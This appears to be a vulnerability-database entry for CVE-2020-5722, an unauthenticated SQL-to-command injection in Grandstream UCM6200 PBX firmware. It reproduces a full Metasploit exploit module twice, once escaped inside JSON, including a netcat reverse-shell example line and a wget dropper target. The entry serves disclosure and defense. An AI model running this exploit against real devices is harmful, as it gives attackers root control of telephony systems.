    5 vulnerabilities found for ucm6200 by grandstream

    VAR-202003-1435

    Vulnerability from variot - Updated: 2025-11-18 15:19

    The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via a crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17. An SQL injection vulnerability exists in the Grandstream UCM6200 series. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream.

    Grandstream UCM6200 versions prior to 1.0.19.20 and versions before 1.0.20.17 have SQL injection vulnerabilities.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE',
        'Description' => %q{
          This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and
          a command injection vulnerability (technically, no assigned CVE but was inadvertently
          patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX
          series of devices.

          Exploitation happens in two stages:
    
          1. An SQL injection during username lookup while executing the "Forgot Password" function. 
          2. A command injection that occurs after the user provided username is passed to a Python script
          via the shell. Like so:
    
          /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
          password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
    
          This module affects UCM62xx versions before firmware version 1.0.19.20.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'jbaines-r7' # Vulnerability discovery, original exploit, and Metasploit module
        ],
        'References' => [
          [ 'CVE', '2020-5722' ],
          [ 'EDB', '48247']
        ],
        'DisclosureDate' => '2020-03-23',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_ARMLE],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'Payload' => {
                'DisableNops' => true,
                'BadChars' => '\'&|'
              },
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_ARMLE],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => [ 'wget' ]
            }
          ]
        ],
        'DefaultTarget' => 1,
        'DefaultOptions' => {
          'RPORT' => 8089,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
    

  end

  ##
  # Sends a POST /cgi request with a payload of action=getInfo. The
  # server should respond with a large json blob like the following,
  # where "prog_version" is the firmware version:
  #
  # {"response"=>{
  #   "model_name"=>"UCM6202", "description"=>"IPPBX Appliance",
  #   "device_name"=>"", "logo"=>"images/h_logo.png", "logo_url"=>"http://www.grandstream.com/",
  #   "copyright"=>"Copyright \u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.",
  #    "num_fxo"=>"2", "num_fxs"=>"2", "num_pri"=>"0", "num_eth"=>"2", "allow_nat"=>"1",
  #    "svip_type"=>"4", "net_mode"=>"0", "prog_version"=>"1.0.18.13", "country"=>"US",
  #    "support_openvpn"=>"1", "enable_openvpn"=>"0", "enable_webrtc_openvpn"=>"0",
  #    "support_webrtc_cloud"=>"0"}, "status"=>0}
  ###
  def check
    normalized_uri = normalize_uri(target_uri.path, '/cgi')
    vprint_status("Requesting version information from #{normalized_uri}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalized_uri,
      'vars_post' => { 'action' => 'getInfo' }
    })

    return CheckCode::Unknown('HTTP status code is not 200') unless res&.code == 200
    
    body_json = res.get_json_document
    return CheckCode::Unknown('No JSON in response') unless body_json
    
    prog_version = body_json.dig('response', 'prog_version')
    return false if prog_version.nil?
    
    vprint_status("The reported version is: #{prog_version}")
    
    version = Rex::Version.new(prog_version)
    if version < Rex::Version.new('1.0.19.20')
      return CheckCode::Appears("This determination is based on the version string: #{prog_version}.")
    end
    
    return CheckCode::Safe("This determination is based on the version string: #{prog_version}.")
    

  end

  ##
  # Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection
  # and then it will get passed to a python script via sh which allows us to execute a command injection.
  # It will look something like this:
  #
  # /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
  #     password '' cat <<'TTsf7G0' z' or 1=1--;nc 10.0.0.3 4444 -e /bin/sh;TTsf7G0
  #
  # This functionality is related to the "Forgot Password" feature. This function is rate limited by
  # the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few
  # payloads are appropriate.
  ###
  def execute_command(cmd, _opts = {})
    rand_num = Rex::Text.rand_text_numeric(1..5)
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/cgi'),
      'vars_post' =>
      {
        'action' => 'sendPasswordEmail',
        'user_name' => "' or #{rand_num}=#{rand_num}--;#{cmd};"
      }
    }, 5)

    # the netcat reverse shell payload holds the connection open. So we'll treat no response
    # as a success. The meterpreter payload does not hold the connection open so this clause digs
    # deeper to ensure it succeeded. The server will respond with a non-0 status if the payload
    # generates an error (e.g. rate limit error)
    if res
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res.code == 200
    
      body_json = res.get_json_document
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
    
      status_json = body_json['status']
      fail_with(Failure::UnexpectedReply, 'The JSON response is missing the status element') unless status_json
      fail_with(Failure::UnexpectedReply, "The server responded with an error status #{status_json}") unless status_json == 0
    end
    
    print_good('Exploit successfully executed.')
    

  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end
end


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1435",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ucm6200",
            "scope": "lt",
            "trust": 1.6,
            "vendor": "grandstream",
            "version": "1.0.19.20"
          },
          {
            "model": "ucm6200",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.19.20"
          },
          {
            "model": "ucm6200",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.17"
          },
          {
            "model": "ucm6200",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "grandstream",
            "version": "1.0.20.17"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6200_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Jacob Baines",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2020-5722",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2020-5722",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 10.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003190",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2020-23201",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2020-5722",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003190",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-5722",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
                "id": "CVE-2020-5722",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-003190",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-23201",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202003-1337",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2020-5722",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5722"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5722"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17. Grandstream UCM6200 In the series SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. \n\r\n\r\nGrandstream UCM6200 versions prior to 1.0.19.20 and versions before 1.0.20.17 have SQL injection vulnerabilities. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  prepend Msf::Exploit::Remote::AutoCheck\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Grandstream UCM62xx IP PBX sendPasswordEmail RCE\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and\n          a command injection vulnerability (technically, no assigned CVE but was inadvertently\n          patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX\n          series of devices. \n\n          Exploitation happens in two stages:\n\n          1. An SQL injection during username lookup while executing the \"Forgot Password\" function. \n          2. A command injection that occurs after the user provided username is passed to a Python script\n          via the shell. 
Like so:\n\n          /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \\\n          password \u0027\u0027 `cat \u003c\u003c\u0027TTsf7G0\u0027 z\u0027 or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `\n\n          This module affect UCM62xx versions before firmware version 1.0.19.20. \n        },\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027Author\u0027 =\u003e [\n          \u0027jbaines-r7\u0027 # Vulnerability discovery, original exploit, and Metasploit module\n        ],\n        \u0027References\u0027 =\u003e [\n          [ \u0027CVE\u0027, \u00272020-5722\u0027 ],\n          [ \u0027EDB\u0027, \u002748247\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272020-03-23\u0027,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD, ARCH_ARMLE],\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027Unix Command\u0027,\n            {\n              \u0027Platform\u0027 =\u003e \u0027unix\u0027,\n              \u0027Arch\u0027 =\u003e ARCH_CMD,\n              \u0027Type\u0027 =\u003e :unix_cmd,\n              \u0027Payload\u0027 =\u003e {\n                \u0027DisableNops\u0027 =\u003e true,\n                \u0027BadChars\u0027 =\u003e \u0027\\\u0027\u0026|\u0027\n              },\n              \u0027DefaultOptions\u0027 =\u003e {\n                \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n              }\n            }\n          ],\n          [\n            \u0027Linux Dropper\u0027,\n            {\n              \u0027Platform\u0027 =\u003e \u0027linux\u0027,\n              \u0027Arch\u0027 =\u003e [ARCH_ARMLE],\n              \u0027Type\u0027 =\u003e :linux_dropper,\n              \u0027CmdStagerFlavor\u0027 =\u003e [ \u0027wget\u0027 ]\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 1,\n        
\u0027DefaultOptions\u0027 =\u003e {\n          \u0027RPORT\u0027 =\u003e 8089,\n          \u0027SSL\u0027 =\u003e true\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [CRASH_SAFE],\n          \u0027Reliability\u0027 =\u003e [REPEATABLE_SESSION],\n          \u0027SideEffects\u0027 =\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n        }\n      )\n    )\n    register_options([\n      OptString.new(\u0027TARGETURI\u0027, [true, \u0027Base path\u0027, \u0027/\u0027])\n    ])\n  end\n\n  ##\n  # Sends a POST /cgi request with a payload of action=getInfo. The\n  # server should respond with a large json blob like the following,\n  # where \"prog_version\" is he firmware version:\n  #\n  # {\"response\"=\u003e{\n  #   \"model_name\"=\u003e\"UCM6202\", \"description\"=\u003e\"IPPBX Appliance\",\n  #   \"device_name\"=\u003e\"\", \"logo\"=\u003e\"images/h_logo.png\", \"logo_url\"=\u003e\"http://www.grandstream.com/\",\n  #   \"copyright\"=\u003e\"Copyright \\u00A9 Grandstream Networks, Inc. 2014. 
All Rights Reserved.\",\n  #    \"num_fxo\"=\u003e\"2\", \"num_fxs\"=\u003e\"2\", \"num_pri\"=\u003e\"0\", \"num_eth\"=\u003e\"2\", \"allow_nat\"=\u003e\"1\",\n  #    \"svip_type\"=\u003e\"4\", \"net_mode\"=\u003e\"0\", \"prog_version\"=\u003e\"1.0.18.13\", \"country\"=\u003e\"US\",\n  #    \"support_openvpn\"=\u003e\"1\", \"enable_openvpn\"=\u003e\"0\", \"enable_webrtc_openvpn\"=\u003e\"0\",\n  #    \"support_webrtc_cloud\"=\u003e\"0\"}, \"status\"=\u003e0}\n  ###\n  def check\n    normalized_uri = normalize_uri(target_uri.path, \u0027/cgi\u0027)\n    vprint_status(\"Requesting version information from #{normalized_uri}\")\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalized_uri,\n      \u0027vars_post\u0027 =\u003e { \u0027action\u0027 =\u003e \u0027getInfo\u0027 }\n    })\n\n    return CheckCode::Unknown(\u0027HTTP status code is not 200\u0027) unless res\u0026.code == 200\n\n    body_json = res.get_json_document\n    return CheckCode::Unknown(\u0027No JSON in response\u0027) unless body_json\n\n    prog_version = body_json.dig(\u0027response\u0027, \u0027prog_version\u0027)\n    return false if prog_version.nil?\n\n    vprint_status(\"The reported version is: #{prog_version}\")\n\n    version = Rex::Version.new(prog_version)\n    if version \u003c Rex::Version.new(\u00271.0.19.20\u0027)\n      return CheckCode::Appears(\"This determination is based on the version string: #{prog_version}.\")\n    end\n\n    return CheckCode::Safe(\"This determination is based on the version string: #{prog_version}.\")\n  end\n\n  ##\n  # Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection\n  # and then it will get passed to a python script via sh which allows us to execute a command injection. 
\n  # It will look something like this:\n  #\n  # /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \\\n  #     password \u0027\u0027 `cat \u003c\u003c\u0027TTsf7G0\u0027 z\u0027 or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `\n  #\n  # This functionality is related to the\"Forgot Password\" feature. This function is rate limited by\n  # the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few\n  # payloads are appropriate. \n  ###\n  def execute_command(cmd, _opts = {})\n    rand_num = Rex::Text.rand_text_numeric(1..5)\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027/cgi\u0027),\n      \u0027vars_post\u0027 =\u003e\n      {\n        \u0027action\u0027 =\u003e \u0027sendPasswordEmail\u0027,\n        \u0027user_name\u0027 =\u003e \"\u0027 or #{rand_num}=#{rand_num}--`;`#{cmd}`;`\"\n      }\n    }, 5)\n\n    # the netcat reverse shell payload holds the connection open. So we\u0027ll treat no response\n    # as a success. The meterpreter payload does not hold the connection open so this clause digs\n    # deeper to ensure it succeeded. The server will respond with a non-0 status if the payload\n    # generates an error (e.g. 
rate limit error)\n    if res\n      fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a 200 OK\u0027) unless res.code == 200\n\n      body_json = res.get_json_document\n      fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a JSON body\u0027) unless body_json\n\n      status_json = body_json[\u0027status\u0027]\n      fail_with(Failure::UnexpectedReply, \u0027The JSON response is missing the status element\u0027) unless status_json\n      fail_with(Failure::UnexpectedReply, \"The server responded with an error status #{status_json}\") unless status_json == 0\n    end\n\n    print_good(\u0027Exploit successfully executed.\u0027)\n  end\n\n  def exploit\n    print_status(\"Executing #{target.name} for #{datastore[\u0027PAYLOAD\u0027]}\")\n    case target[\u0027Type\u0027]\n    when :unix_cmd\n      execute_command(payload.encoded)\n    when :linux_dropper\n      execute_cmdstager\n    end\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-5722"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5722"
          },
          {
            "db": "PACKETSTORM",
            "id": "165708"
          }
        ],
        "trust": 2.34
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=48247",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-5722",
            "trust": 3.2
          },
          {
            "db": "PACKETSTORM",
            "id": "156876",
            "trust": 3.1
          },
          {
            "db": "PACKETSTORM",
            "id": "165708",
            "trust": 1.8
          },
          {
            "db": "TENABLE",
            "id": "TRA-2020-15",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190",
            "trust": 0.8
          },
          {
            "db": "EXPLOIT-DB",
            "id": "48247",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5722",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5722"
          },
          {
            "db": "PACKETSTORM",
            "id": "165708"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "id": "VAR-202003-1435",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          }
        ],
        "trust": 1.45714287
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          }
        ]
      },
      "last_update_date": "2025-11-18T15:19:46.068000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.grandstream.com/"
          },
          {
            "title": "Patch for Grandstream UCM6200 SQL injection vulnerability (CNVD-2020-23201)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/214293"
          },
          {
            "title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=112779"
          },
          {
            "title": "Known Exploited Vulnerabilities Detector",
            "trust": 0.1,
            "url": "https://github.com/Ostorlab/KEV "
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/"
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5722"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.7,
            "url": "http://packetstormsecurity.com/files/156876/ucm6202-1.0.18.13-remote-command-injection.html"
          },
          {
            "trust": 2.3,
            "url": "http://packetstormsecurity.com/files/165708/grandstream-ucm62xx-ip-pbx-sendpasswordemail-remote-code-execution.html"
          },
          {
            "trust": 1.7,
            "url": "https://www.tenable.com/security/research/tra-2020-15"
          },
          {
            "trust": 1.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5722"
          },
          {
            "trust": 1.0,
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2020-5722"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5722"
          },
          {
            "trust": 0.7,
            "url": "https://www.exploit-db.com/exploits/48247"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/89.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
